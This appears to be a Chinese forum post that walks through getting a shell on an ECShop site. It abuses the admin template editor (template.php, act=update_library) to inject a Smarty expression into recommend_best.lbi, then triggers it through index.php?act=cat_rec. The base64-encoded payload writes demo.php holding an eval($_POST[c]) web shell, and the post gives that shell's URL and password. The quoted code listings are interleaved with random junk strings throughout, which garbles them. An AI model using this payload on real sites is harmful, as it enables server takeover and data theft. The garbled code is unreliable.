Ecshop后台getshell

admin

首先 ecshop用的是smarty 这样就可以通过它的fetch函数来执行模板
; |9 Z- N1 u; c* l
" v0 m, t- b( f' G而模板里面可以执行他定义的php代码，这样只要可以写出模板 然后找到调用就可以拿到shell了
但是ecshop似乎不支持{php}{/php}这个标签来执行php代码
2 V) Q6 ?: f5 @0 N( x4 Eadmin/template.php
3 `- L# J+ g" k) G8 r
1 if ($_REQUEST['act'] == 'update_library')

' C; g! U+ m) ~5 G2   
- j1 q* |" `4 N2 `
- `$ b  S2 ^/ Y1 Y6 X2 j& y7 E& F# H3 {
% ?0 m& X; a* g2 c2 e
5 S3 d$ Q8 b% P1 }4     check_authz_json('library_manage');

5   

1 Z0 E& Y! Q, s6 a  t8 A' w2 f! p5 t6     $html = stripslashes(json_str_iconv($_POST['html']));
4 d$ {- W) c$ n( T' F- ?
7   

8     $lib_file = '../themes/' . $_CFG['template'] . '/library/' .$_POST['lib'] . '.lbi'; //模板文件

9   
& r& v) k. d; b! }- \7 ?* w
( r  k$ }* q% o, U, t' U10     $lib_file = str_replace("0xa", '', $lib_file); // 过滤 0xa 非法字符
( ?  Z" h" h4 {2 O
11   

12     $org_html = str_replace("\xEF\xBB\xBF", '',file_get_contents($lib_file));

  z) E( O; m" i$ G7 Q; q13   

14     if (@file_exists($lib_file) === true && @file_put_contents($lib_file,$html))//写出

% ~" `& g, R! E; h/ n* W+ w15     {
' u# q* {1 q" L8 _' X% J
: H8 o% ~$ n# C2 C: R% M5 h5 }6 @16         @file_put_contents('../temp/backup/library/' . $_CFG['template'] .'-' . $_POST['lib'] . '.lbi', $org_html);
& i4 h5 w4 L' G
6 H2 }, k0 n5 S3 r* B7 X) j17         make_json_result('', $_LANG['update_lib_success']);

18     }
0 ~: {- Z5 X, j4 x9 c. ?
& x" n" g' W( b/ b9 k9 Y, J19     else

) H  D! ?3 r  w  E! g" Z" z20     {

21         make_json_error(sprintf($_LANG['update_lib_failed'], 'themes/' .$_CFG['template'] . '/library'));

22     }

' V+ n% Y) R( O; E23 }

* J: ]: h: x$ |) r" {1 E) `) Y那么找个比较方便调用了模板的文件
2 b# S! X: T4 m5 h  {5 yindex.php

1 if ($act == 'cat_rec')
; Y/ r! c$ @. m9 @; k
2   

3 {
" b0 N& V! f( F
4   
7 }! {. ?& S2 i8 x) F
: j: t  a: t/ A4 E9 j6 y5     $rec_array = array(1 => 'best', 2 => 'new', 3 => 'hot');
! c* k3 C/ L! G- V! s
1 n  A$ n8 W) y3 C. J0 {5 N5 A0 `% z7 X6   

7     $rec_type = !empty($_REQUEST['rec_type']) ?intval($_REQUEST['rec_type']) : '1';

8   

9     $cat_id = !empty($_REQUEST['cid']) ? intval($_REQUEST['cid']) : '0';
  \2 V$ J8 h- T5 k7 F# e. S
! v% e3 S7 c+ F1 c- @10   

11     include_once('includes/cls_json.php');

12   
; l- J4 E/ J4 I) N3 Q
13     $json = new JSON;
& H5 E/ @) r5 a* ]: I9 {  P' f
14   

& e! d, q5 L( Y6 P3 {; X15     $result   = array('error' => 0, 'content' => '', 'type' => $rec_type,'cat_id' => $cat_id);

' j4 {' n9 ]9 W5 a4 x8 Q$ d16   

17     $children = get_children($cat_id);

1 s2 r) w, D  P; A( C18   
0 }+ j/ S) R: d  ]
19     $smarty->assign($rec_array[$rec_type] . '_goods',      get_category_recommend_goods($rec_array[$rec_type], $children));    // 推荐商品
" ^* n& ?+ Y# X+ C( f" {* [1 c5 e7 i
20   

21     $smarty->assign('cat_rec_sign', 1);
: H& \" v/ p9 `
( q; c2 \3 D; R. c, r! U* q22   
5 k5 w5 w/ _: l# N
23     $result['content'] = $smarty->fetch('library/recommend_' .$rec_array[$rec_type] . '.lbi');//使用了模板文件 该模板文件为recommend_best
/ W5 R- |% X" `& Y9 s/ e
$ w# x+ {5 ?6 p6 {& y  }24   

. J6 \0 @0 G8 o: C% q$ g25         echo 'library/recommend_' . $rec_array[$rec_type] . '.lbi';

26   

! N  Y* n" r, y+ `27         echo $rec_array[$rec_type];
( B$ G) C' \: t- D! C6 U
28   
/ v: `5 W" }0 H+ t/ ]# m
29     die($json->encode($result));
3 _; C  I6 @9 u( x
6 k( X6 a/ B; g! V; K- p2 Q30   
7 G9 `4 d, w# @4 H% U# e; ]
+ H9 H' R% V# M' Q( f9 k) ?* M8 n31 }
" S0 {% x) x0 z% @, H& E
那么就有利用方法了
post包到http://localhost/ec/admin/template.php?act=update_library
Post内容：
2 k0 Y2 x' P8 S' q2 v
​
0 O# _3 g+ B1 x% H. w9 E: p1 lib=recommend_best&html={iffputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}16086{/if}

  ]- f+ s( @& s然后访问http://localhost/ec/index.php?act=cat_rec
3 s7 p8 A: K5 Z7 P! n1 V# D- @
% l( ~7 W; k9 _# x( ]/ o9 {7 l1 yshel地址：http://localhost/ec/demo.php
密码c